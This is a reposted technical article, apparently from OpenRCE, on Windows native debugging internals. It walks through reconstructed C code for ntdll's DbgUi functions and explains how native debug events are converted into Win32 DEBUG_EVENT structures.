Not much explaining is required. As we walk the list, we try to locate a structure which matches the PID and TID we were given. Once it's been located, we check if a handle is associated with the thread and the process.
If it is, then we can now close the handle. The purpose of this high-level Win32 mechanism is now apparent: it's how we can associate handles with IDs, and close them when cleaning up or continuing. This is necessary because these handles were not opened by Win32, but behind its back by Dbgk. Once the handles are closed, we unlink this structure by changing the TEB pointer to the next structure in the list, and we then free the structure itself. We then resume parsing from the next structure on (because more than one such structure could be associated with this PID/TID). Finally, one last piece of the Win32 puzzle is missing in our analysis, and this is the detach function, which was added in XP. Let's take a look at its trivial implementation:

BOOL
WINAPI
DebugActiveProcessStop(IN DWORD dwProcessId)
{
    NTSTATUS Status;
    HANDLE Handle;

    /* Get the process handle */
    Handle = ProcessIdToHandle(dwProcessId);
    if (!Handle) return FALSE;

    /* Close all the process handles */
    CloseAllProcessHandles(dwProcessId);

    /* Now stop debugging the process */
    Status = DbgUiStopDebugging(Handle);
    NtClose(Handle);

    /* Check for failure */
    if (!NT_SUCCESS(Status))
    {
        /* Fail */
        SetLastError(ERROR_ACCESS_DENIED);
        return FALSE;
    }

    /* Success */
    return TRUE;
}

It couldn't really get any simpler. Just like for attaching, we first convert the PID to a handle, and then use a DbgUi call (DbgUiStopDebugging) with this process handle in order to detach ourselves from the process. There's one more call being made here, which is CloseAllProcessHandles. This is part of Win32's high-level debugging layer on top of DbgUi, which we've seen just earlier.
This routine is very similar to RemoveHandles, but it only deals with a Process ID, so the implementation is simpler:

VOID
WINAPI
CloseAllProcessHandles(IN DWORD dwProcessId)
{
    PDBGSS_THREAD_DATA ThreadData;

    /* Loop all thread data events */
    ThreadData = DbgSsGetThreadData();
    while (ThreadData)
    {
        /* Check if this one matches */
        if (ThreadData->ProcessId == dwProcessId)
        {
            /* Check if we have a thread handle */
            if (ThreadData->ThreadHandle)
            {
                /* Close it */
                CloseHandle(ThreadData->ThreadHandle);
            }

            /* Check if we have a process handle */
            if (ThreadData->ProcessHandle)
            {
                /* Close it */
                CloseHandle(ThreadData->ProcessHandle);
            }

            /* Unlink the thread data */
            DbgSsSetThreadData(ThreadData->Next);

            /* Free it */
            RtlFreeHeap(RtlGetProcessHeap(), 0, ThreadData);

            /* Move to the next structure */
            ThreadData = DbgSsGetThreadData();
            continue;
        }

        /* Move to the next one */
        ThreadData = ThreadData->Next;
    }
}

And this completes our analysis of the Win32 APIs! Let's take a look at what we've learnt:

- The actual debugging functionality is present in a module called Dbgk inside the kernel. It's accessible through the DbgUi Native API interface, located inside the NT System Library, ntdll.
- Dbgk implements debugging functionality through an NT object, called a Debug Object, which also provides an NtSetInformation API in order to modify certain flags.
- The Debug Object associated with a thread can be retrieved with DbgUiGetThreadDebugObject, but we have not yet shown where this is stored.
- Checking if a process is being debugged can be done by using NtQueryInformationProcess with the ProcessDebugPort information class. This cannot be cheated without a rootkit.
- Because Dbgk opens certain handles during debug events, Win32 needs a way to associate IDs and handles, and uses a linked list of structures called DBGSS_THREAD_DATA, stored in the TEB's DbgSsReserved[0] member.

Sursa: OpenRCE
  25. Windows Native Debugging Internals

Author: Alex Ionescu

Introduction

In part two of this three-part article series, the native interface to Windows debugging is dissected in detail. The reader is expected to have some basic knowledge of C and general NT kernel architecture and semantics. Also, this is not an introduction to what debugging is or how to write a debugger. It is meant as a reference for experienced debugger writers, or curious security experts.

Native Debugging

Now it's time to look at the native side of things, and how the wrapper layer inside ntdll.dll communicates with the kernel. The advantage of having the DbgUi layer is that it allows better separation between Win32 and the NT kernel, which has always been part of NT's design. NTDLL and NTOSKRNL are built together, so it's normal for them to have intricate knowledge of each other: they share the same structures, they need to have the same system call IDs, and so on. In a perfect world, the NT kernel should have to know nothing about Win32. Additionally, DbgUi helps anyone who wants to add debugging capabilities to a native application, or to write a fully featured native-mode debugger. Without DbgUi, one would have to call the Nt*DebugObject APIs manually, and do some extensive pre/post-processing in some cases. DbgUi simplifies all this work to a single call, and provides a clean interface for it. If the kernel changes internally, DbgUi will probably stay the same; only its internal code would be modified. We start our exploration with the function responsible for creating and associating a Debug Object with the current process. Unlike in the Win32 world, there is a clear distinction between creating a Debug Object and actually attaching to a process.
NTSTATUS
NTAPI
DbgUiConnectToDbg(VOID)
{
    OBJECT_ATTRIBUTES ObjectAttributes;

    /* Don't connect twice */
    if (NtCurrentTeb()->DbgSsReserved[1]) return STATUS_SUCCESS;

    /* Setup the attributes */
    InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, 0);

    /* Create the object */
    return ZwCreateDebugObject(&NtCurrentTeb()->DbgSsReserved[1],
                               DEBUG_OBJECT_ALL_ACCESS,
                               &ObjectAttributes,
                               TRUE);
}

As you can see, this is a trivial implementation, but it shows us two things. Firstly, a thread can only have one Debug Object associated with it, and secondly, the handle to this object is stored in the TEB's DbgSsReserved array field. Recall that in Win32, the first index, [0], is where the thread data is stored. We've now learnt that [1] is where the handle is stored. Now let's see how attaching and detaching are done:

NTSTATUS
NTAPI
DbgUiDebugActiveProcess(IN HANDLE Process)
{
    NTSTATUS Status;

    /* Tell the kernel to start debugging */
    Status = NtDebugActiveProcess(Process, NtCurrentTeb()->DbgSsReserved[1]);
    if (NT_SUCCESS(Status))
    {
        /* Now break-in the process */
        Status = DbgUiIssueRemoteBreakin(Process);
        if (!NT_SUCCESS(Status))
        {
            /* We couldn't break-in, cancel debugging */
            DbgUiStopDebugging(Process);
        }
    }

    /* Return status */
    return Status;
}

NTSTATUS
NTAPI
DbgUiStopDebugging(IN HANDLE Process)
{
    /* Call the kernel to remove the debug object */
    return NtRemoveProcessDebug(Process, NtCurrentTeb()->DbgSsReserved[1]);
}

Again, these are very simple implementations. We can learn, however, that the kernel is not responsible for actually breaking inside the remote process, but that this is done by the native layer.
This DbgUiIssueRemoteBreakin API is also used by Win32 when calling DebugBreakProcess, so let's look at it:

NTSTATUS
NTAPI
DbgUiIssueRemoteBreakin(IN HANDLE Process)
{
    HANDLE hThread;
    CLIENT_ID ClientId;
    NTSTATUS Status;

    /* Create the thread that will do the breakin */
    Status = RtlCreateUserThread(Process,
                                 NULL,
                                 FALSE,
                                 0,
                                 0,
                                 PAGE_SIZE,
                                 (PVOID)DbgUiRemoteBreakin,
                                 NULL,
                                 &hThread,
                                 &ClientId);

    /* Close the handle on success */
    if (NT_SUCCESS(Status)) NtClose(hThread);

    /* Return status */
    return Status;
}

All it does is create a remote thread inside the process, and then return to the caller. Does that remote thread do anything magic? Let's see:

VOID
NTAPI
DbgUiRemoteBreakin(VOID)
{
    /* Make sure a debugger is enabled; if so, breakpoint */
    if (NtCurrentPeb()->BeingDebugged) DbgBreakPoint();

    /* Exit the thread */
    RtlExitUserThread(STATUS_SUCCESS);
}

Nothing special at all; the thread makes sure that the process is really being debugged, and then issues a breakpoint. And, because this API is exported, you can call it locally from your own process to issue a debug break (but note that you will kill your own thread). In our look at the Win32 debugging implementation, we noticed that the actual debug handle is never used, and that calls always go through DbgUi. When the NtSetInformationDebugObject system call was made, a special DbgUi API was called beforehand to actually get the Debug Object associated with the thread. This API also has a counterpart, so let's see both in action:

HANDLE
NTAPI
DbgUiGetThreadDebugObject(VOID)
{
    /* Just return the handle from the TEB */
    return NtCurrentTeb()->DbgSsReserved[1];
}

VOID
NTAPI
DbgUiSetThreadDebugObject(HANDLE DebugObject)
{
    /* Just set the handle in the TEB */
    NtCurrentTeb()->DbgSsReserved[1] = DebugObject;
}

For those familiar with object-oriented programming, this will seem similar to the concept of accessor and mutator methods.
Even though Win32 has perfect access to this handle and could simply read it on its own, the NT developers decided to make DbgUi much like a class, and make sure access to the handle goes through these public methods. This design allows the debug handle to be stored anywhere else if necessary; only these two APIs would require changes, instead of multiple DLLs in Win32. Now for a visit to the wait/continue functions, which under Win32 were simply wrappers:

NTSTATUS
NTAPI
DbgUiContinue(IN PCLIENT_ID ClientId,
              IN NTSTATUS ContinueStatus)
{
    /* Tell the kernel object to continue */
    return ZwDebugContinue(NtCurrentTeb()->DbgSsReserved[1],
                           ClientId,
                           ContinueStatus);
}

NTSTATUS
NTAPI
DbgUiWaitStateChange(OUT PDBGUI_WAIT_STATE_CHANGE DbgUiWaitStateChange,
                     IN PLARGE_INTEGER TimeOut OPTIONAL)
{
    /* Tell the kernel to wait */
    return NtWaitForDebugEvent(NtCurrentTeb()->DbgSsReserved[1],
                               TRUE,
                               TimeOut,
                               DbgUiWaitStateChange);
}

Not surprisingly, these functions are also wrappers in DbgUi. However, this is where things start to get interesting, since, if you'll recall, DbgUi uses a completely different structure for debug events, called DBGUI_WAIT_STATE_CHANGE.
There is one API that we have left to look at, which does the conversion, so first, let's look at the documentation for this structure:

//
// User-Mode Debug State Change Structure
//
typedef struct _DBGUI_WAIT_STATE_CHANGE
{
    DBG_STATE NewState;
    CLIENT_ID AppClientId;
    union
    {
        struct
        {
            HANDLE HandleToThread;
            DBGKM_CREATE_THREAD NewThread;
        } CreateThread;
        struct
        {
            HANDLE HandleToProcess;
            HANDLE HandleToThread;
            DBGKM_CREATE_PROCESS NewProcess;
        } CreateProcessInfo;
        DBGKM_EXIT_THREAD ExitThread;
        DBGKM_EXIT_PROCESS ExitProcess;
        DBGKM_EXCEPTION Exception;
        DBGKM_LOAD_DLL LoadDll;
        DBGKM_UNLOAD_DLL UnloadDll;
    } StateInfo;
} DBGUI_WAIT_STATE_CHANGE, *PDBGUI_WAIT_STATE_CHANGE;

The fields should be pretty self-explanatory, so let's look at the DBG_STATE enumeration:

//
// Debug States
//
typedef enum _DBG_STATE
{
    DbgIdle,
    DbgReplyPending,
    DbgCreateThreadStateChange,
    DbgCreateProcessStateChange,
    DbgExitThreadStateChange,
    DbgExitProcessStateChange,
    DbgExceptionStateChange,
    DbgBreakpointStateChange,
    DbgSingleStepStateChange,
    DbgLoadDllStateChange,
    DbgUnloadDllStateChange
} DBG_STATE, *PDBG_STATE;

If you take a look at the Win32 DEBUG_EVENT structure and its associated debug event types, you'll notice some differences which might be useful to you. For starters, exceptions, breakpoints, and single-step exceptions are handled differently. In the Win32 world, only two distinctions are made: RIP_EVENT for errors, and EXCEPTION_DEBUG_EVENT for a debug exception. Although Win32 code can later figure out whether an exception was a breakpoint or a single step, here this information comes directly in the native structure. You will also notice that the OUTPUT_DEBUG_STRING event is missing. Here it's DbgUi that's at a disadvantage, since the information is sent as an exception, and post-processing is required (which we'll take a look at soon). There are also two more states that Win32 does not support: the Idle state and the Reply Pending state.
These don't offer much information from the point of view of a debugger, so they are ignored. Now let's take a look at the actual structures seen in the unions:

//
// Debug Message Structures
//
typedef struct _DBGKM_EXCEPTION
{
    EXCEPTION_RECORD ExceptionRecord;
    ULONG FirstChance;
} DBGKM_EXCEPTION, *PDBGKM_EXCEPTION;

typedef struct _DBGKM_CREATE_THREAD
{
    ULONG SubSystemKey;
    PVOID StartAddress;
} DBGKM_CREATE_THREAD, *PDBGKM_CREATE_THREAD;

typedef struct _DBGKM_CREATE_PROCESS
{
    ULONG SubSystemKey;
    HANDLE FileHandle;
    PVOID BaseOfImage;
    ULONG DebugInfoFileOffset;
    ULONG DebugInfoSize;
    DBGKM_CREATE_THREAD InitialThread;
} DBGKM_CREATE_PROCESS, *PDBGKM_CREATE_PROCESS;

typedef struct _DBGKM_EXIT_THREAD
{
    NTSTATUS ExitStatus;
} DBGKM_EXIT_THREAD, *PDBGKM_EXIT_THREAD;

typedef struct _DBGKM_EXIT_PROCESS
{
    NTSTATUS ExitStatus;
} DBGKM_EXIT_PROCESS, *PDBGKM_EXIT_PROCESS;

typedef struct _DBGKM_LOAD_DLL
{
    HANDLE FileHandle;
    PVOID BaseOfDll;
    ULONG DebugInfoFileOffset;
    ULONG DebugInfoSize;
    PVOID NamePointer;
} DBGKM_LOAD_DLL, *PDBGKM_LOAD_DLL;

typedef struct _DBGKM_UNLOAD_DLL
{
    PVOID BaseAddress;
} DBGKM_UNLOAD_DLL, *PDBGKM_UNLOAD_DLL;

If you're familiar with the DEBUG_EVENT structure, you should notice some subtle differences. First of all, there is no indication of the process name, which explains why MSDN documents that field as optional and not used by Win32. You will also notice the lack of a pointer to the TEB in the thread structure. Finally, unlike for new processes, Win32 does display the name of any new DLL loaded, but this also seems to be missing in the Load DLL structure; we'll see how this and other differences are dealt with soon. As far as extra information goes, however, we have the SubSystemKey field. Because NT was designed to support multiple subsystems, this field is critical to identifying which subsystem the new thread or process was created from.
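Before moving on, it may help to summarize how these native states relate to the Win32 event codes. The portable sketch below models the mapping that the conversion routine performs; the numeric Win32 values are the documented winbase.h constants, while the three exception-related states all collapse into EXCEPTION_DEBUG_EVENT here (the debug-string and RIP special cases are decided later by exception code, not by state).

```c
/* DBG_STATE values, in the order of the enum shown above */
typedef enum {
    DbgIdle, DbgReplyPending,
    DbgCreateThreadStateChange, DbgCreateProcessStateChange,
    DbgExitThreadStateChange, DbgExitProcessStateChange,
    DbgExceptionStateChange, DbgBreakpointStateChange,
    DbgSingleStepStateChange,
    DbgLoadDllStateChange, DbgUnloadDllStateChange
} DBG_STATE;

/* Documented Win32 debug event codes (winbase.h) */
#define EXCEPTION_DEBUG_EVENT       1
#define CREATE_THREAD_DEBUG_EVENT   2
#define CREATE_PROCESS_DEBUG_EVENT  3
#define EXIT_THREAD_DEBUG_EVENT     4
#define EXIT_PROCESS_DEBUG_EVENT    5
#define LOAD_DLL_DEBUG_EVENT        6
#define UNLOAD_DLL_DEBUG_EVENT      7
#define OUTPUT_DEBUG_STRING_EVENT   8
#define RIP_EVENT                   9

/* Returns 0 when there is no Win32 equivalent (Idle/ReplyPending) */
static int MapStateToWin32(DBG_STATE s)
{
    switch (s)
    {
        case DbgCreateThreadStateChange:  return CREATE_THREAD_DEBUG_EVENT;
        case DbgCreateProcessStateChange: return CREATE_PROCESS_DEBUG_EVENT;
        case DbgExitThreadStateChange:    return EXIT_THREAD_DEBUG_EVENT;
        case DbgExitProcessStateChange:   return EXIT_PROCESS_DEBUG_EVENT;
        /* All three exception-like states become one Win32 event code */
        case DbgExceptionStateChange:
        case DbgBreakpointStateChange:
        case DbgSingleStepStateChange:    return EXCEPTION_DEBUG_EVENT;
        case DbgLoadDllStateChange:       return LOAD_DLL_DEBUG_EVENT;
        case DbgUnloadDllStateChange:     return UNLOAD_DLL_DEBUG_EVENT;
        default:                          return 0;
    }
}
```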
Windows 2003 SP1 adds support for debugging POSIX applications, and while I haven't looked at the POSIX debug APIs, I'm convinced they're built around the DbgUi implementation, and that this field is used differently by the POSIX library (much like Win32 ignores it). Now that we've seen the differences, the final API to look at is DbgUiConvertStateChangeStructure, which is responsible for doing these modifications and fixups:

NTSTATUS
NTAPI
DbgUiConvertStateChangeStructure(IN PDBGUI_WAIT_STATE_CHANGE WaitStateChange,
                                 OUT PVOID Win32DebugEvent)
{
    NTSTATUS Status;
    OBJECT_ATTRIBUTES ObjectAttributes;
    THREAD_BASIC_INFORMATION ThreadBasicInfo;
    LPDEBUG_EVENT DebugEvent = Win32DebugEvent;
    HANDLE ThreadHandle;

    /* Write common data */
    DebugEvent->dwProcessId = (DWORD)WaitStateChange->AppClientId.UniqueProcess;
    DebugEvent->dwThreadId = (DWORD)WaitStateChange->AppClientId.UniqueThread;

    /* Check what kind of event this is */
    switch (WaitStateChange->NewState)
    {
        /* New thread */
        case DbgCreateThreadStateChange:

            /* Setup Win32 code */
            DebugEvent->dwDebugEventCode = CREATE_THREAD_DEBUG_EVENT;

            /* Copy data over */
            DebugEvent->u.CreateThread.hThread =
                WaitStateChange->StateInfo.CreateThread.HandleToThread;
            DebugEvent->u.CreateThread.lpStartAddress =
                WaitStateChange->StateInfo.CreateThread.NewThread.StartAddress;

            /* Query the TEB */
            Status = NtQueryInformationThread(
                WaitStateChange->StateInfo.CreateThread.HandleToThread,
                ThreadBasicInformation,
                &ThreadBasicInfo,
                sizeof(ThreadBasicInfo),
                NULL);
            if (!NT_SUCCESS(Status))
            {
                /* Failed to get TEB address */
                DebugEvent->u.CreateThread.lpThreadLocalBase = NULL;
            }
            else
            {
                /* Write TEB address */
                DebugEvent->u.CreateThread.lpThreadLocalBase =
                    ThreadBasicInfo.TebBaseAddress;
            }
            break;

        /* New process */
        case DbgCreateProcessStateChange:

            /* Write Win32 debug code */
            DebugEvent->dwDebugEventCode = CREATE_PROCESS_DEBUG_EVENT;

            /* Copy data over */
            DebugEvent->u.CreateProcessInfo.hProcess =
                WaitStateChange->StateInfo.CreateProcessInfo.HandleToProcess;
            DebugEvent->u.CreateProcessInfo.hThread =
                WaitStateChange->StateInfo.CreateProcessInfo.HandleToThread;
            DebugEvent->u.CreateProcessInfo.hFile =
                WaitStateChange->StateInfo.CreateProcessInfo.NewProcess.FileHandle;
            DebugEvent->u.CreateProcessInfo.lpBaseOfImage =
                WaitStateChange->StateInfo.CreateProcessInfo.NewProcess.BaseOfImage;
            DebugEvent->u.CreateProcessInfo.dwDebugInfoFileOffset =
                WaitStateChange->StateInfo.CreateProcessInfo.NewProcess.DebugInfoFileOffset;
            DebugEvent->u.CreateProcessInfo.nDebugInfoSize =
                WaitStateChange->StateInfo.CreateProcessInfo.NewProcess.DebugInfoSize;
            DebugEvent->u.CreateProcessInfo.lpStartAddress =
                WaitStateChange->StateInfo.CreateProcessInfo.NewProcess.InitialThread.StartAddress;

            /* Query TEB address */
            Status = NtQueryInformationThread(
                WaitStateChange->StateInfo.CreateProcessInfo.HandleToThread,
                ThreadBasicInformation,
                &ThreadBasicInfo,
                sizeof(ThreadBasicInfo),
                NULL);
            if (!NT_SUCCESS(Status))
            {
                /* Failed to get TEB address */
                DebugEvent->u.CreateProcessInfo.lpThreadLocalBase = NULL;
            }
            else
            {
                /* Write TEB address */
                DebugEvent->u.CreateProcessInfo.lpThreadLocalBase =
                    ThreadBasicInfo.TebBaseAddress;
            }

            /* Clear image name */
            DebugEvent->u.CreateProcessInfo.lpImageName = NULL;
            DebugEvent->u.CreateProcessInfo.fUnicode = TRUE;
            break;

        /* Thread exited */
        case DbgExitThreadStateChange:

            /* Write the Win32 debug code and the exit status */
            DebugEvent->dwDebugEventCode = EXIT_THREAD_DEBUG_EVENT;
            DebugEvent->u.ExitThread.dwExitCode =
                WaitStateChange->StateInfo.ExitThread.ExitStatus;
            break;

        /* Process exited */
        case DbgExitProcessStateChange:

            /* Write the Win32 debug code and the exit status */
            DebugEvent->dwDebugEventCode = EXIT_PROCESS_DEBUG_EVENT;
            DebugEvent->u.ExitProcess.dwExitCode =
                WaitStateChange->StateInfo.ExitProcess.ExitStatus;
            break;

        /* Any sort of exception */
        case DbgExceptionStateChange:
        case DbgBreakpointStateChange:
        case DbgSingleStepStateChange:

            /* Check if this was a debug print */
            if (WaitStateChange->StateInfo.Exception.ExceptionRecord.ExceptionCode ==
                DBG_PRINTEXCEPTION_C)
            {
                /* Set the Win32 code */
                DebugEvent->dwDebugEventCode = OUTPUT_DEBUG_STRING_EVENT;

                /* Copy debug string information */
                DebugEvent->u.DebugString.lpDebugStringData =
                    (PVOID)WaitStateChange->StateInfo.Exception.
                        ExceptionRecord.ExceptionInformation[1];
                DebugEvent->u.DebugString.nDebugStringLength =
                    WaitStateChange->StateInfo.Exception.
                        ExceptionRecord.ExceptionInformation[0];
                DebugEvent->u.DebugString.fUnicode = FALSE;
            }
            else if (WaitStateChange->StateInfo.Exception.ExceptionRecord.ExceptionCode ==
                     DBG_RIPEXCEPTION)
            {
                /* Set the Win32 code */
                DebugEvent->dwDebugEventCode = RIP_EVENT;

                /* Set exception information */
                DebugEvent->u.RipInfo.dwType =
                    WaitStateChange->StateInfo.Exception.
                        ExceptionRecord.ExceptionInformation[1];
                DebugEvent->u.RipInfo.dwError =
                    WaitStateChange->StateInfo.Exception.
                        ExceptionRecord.ExceptionInformation[0];
            }
            else
            {
                /* Otherwise, this is a debug event, copy info over */
                DebugEvent->dwDebugEventCode = EXCEPTION_DEBUG_EVENT;
                DebugEvent->u.Exception.ExceptionRecord =
                    WaitStateChange->StateInfo.Exception.ExceptionRecord;
                DebugEvent->u.Exception.dwFirstChance =
                    WaitStateChange->StateInfo.Exception.FirstChance;
            }
            break;

        /* DLL load */
        case DbgLoadDllStateChange:

            /* Set the Win32 debug code */
            DebugEvent->dwDebugEventCode = LOAD_DLL_DEBUG_EVENT;

            /* Copy the rest of the data */
            DebugEvent->u.LoadDll.lpBaseOfDll =
                WaitStateChange->StateInfo.LoadDll.BaseOfDll;
            DebugEvent->u.LoadDll.hFile =
                WaitStateChange->StateInfo.LoadDll.FileHandle;
            DebugEvent->u.LoadDll.dwDebugInfoFileOffset =
                WaitStateChange->StateInfo.LoadDll.DebugInfoFileOffset;
            DebugEvent->u.LoadDll.nDebugInfoSize =
                WaitStateChange->StateInfo.LoadDll.DebugInfoSize;

            /* Open the thread */
            InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL);
            Status = NtOpenThread(&ThreadHandle,
                                  THREAD_QUERY_INFORMATION,
                                  &ObjectAttributes,
                                  &WaitStateChange->AppClientId);
            if (NT_SUCCESS(Status))
            {
                /* Query thread information */
                Status = NtQueryInformationThread(ThreadHandle,
                                                  ThreadBasicInformation,
                                                  &ThreadBasicInfo,
                                                  sizeof(ThreadBasicInfo),
                                                  NULL);
                NtClose(ThreadHandle);
            }

            /* Check if we got thread information */
            if (NT_SUCCESS(Status))
            {
                /* Save the image name from the TIB */
                DebugEvent->u.LoadDll.lpImageName =
                    &((PTEB)ThreadBasicInfo.TebBaseAddress)->
                        Tib.ArbitraryUserPointer;
            }
            else
            {
                /* Otherwise, no name */
                DebugEvent->u.LoadDll.lpImageName = NULL;
            }

            /* It's Unicode */
            DebugEvent->u.LoadDll.fUnicode = TRUE;
            break;

        /* DLL unload */
        case DbgUnloadDllStateChange:

            /* Set Win32 code and DLL base */
            DebugEvent->dwDebugEventCode = UNLOAD_DLL_DEBUG_EVENT;
            DebugEvent->u.UnloadDll.lpBaseOfDll =
                WaitStateChange->StateInfo.UnloadDll.BaseAddress;
            break;

        /* Anything else, fail */
        default:
            return STATUS_UNSUCCESSFUL;
    }

    /* Return success */
    return STATUS_SUCCESS;
}

Let's take a look at the interesting fixups. First of all, the lack of a TEB pointer is easily remedied by calling NtQueryInformationThread with the ThreadBasicInformation class, which returns, among other things, a pointer to the TEB, which is then saved in the Win32 structure. As for debug strings, the API analyzes the exception code and looks for DBG_PRINTEXCEPTION_C, whose specific exception record is parsed and converted into debug string output. So far so good, but perhaps the nastiest hack is present in the code for DLL loading. Because a loaded DLL doesn't have a structure like EPROCESS or ETHREAD in kernel memory, only entries in ntdll's private Ldr structures, the only thing that identifies it is the Section Object for its memory-mapped file. When the kernel gets a request to create a section for an executable memory-mapped file, it saves the name of the file in a field inside the TEB (or TIB, rather) called ArbitraryUserPointer. This function then knows that a string is located there, and sets it as the pointer for the debug event's lpImageName member. This hack has been in NT ever since the first builds, and as far as I know, it's still there in Vista. Could it be that hard to solve? Once again, we come to an end in our discussion, since there isn't much left in ntdll that deals with the Debug Object. Here's an overview of what was discussed in this part of the series:

- DbgUi provides a level of separation between the kernel and Win32 or other subsystems. It's written as a fully independent class, even having accessor and mutator methods instead of exposing its handles.
- The handle to a thread's Debug Object is stored in the second field of the DbgSsReserved array in the TEB.
- DbgUi allows a thread to have a single Debug Object, but using the native system calls allows you to use as many as you want.
- Most DbgUi APIs are simple wrappers around the NtXxxDebugObject system calls, and use the TEB handle to communicate.
- DbgUi is responsible for breaking into the attached process, not the kernel.
- DbgUi uses its own structure for debug events, which the kernel understands. In some ways, this structure provides more information about some events (such as the subsystem, and whether this was a single-step or a breakpoint exception), but in others, some information is missing (such as a pointer to the thread's TEB, or a separate debug string structure).
- The TIB (located inside the TEB) has an ArbitraryUserPointer member which contains the name of the loaded DLL during a debug event.

Sursa: OpenRCE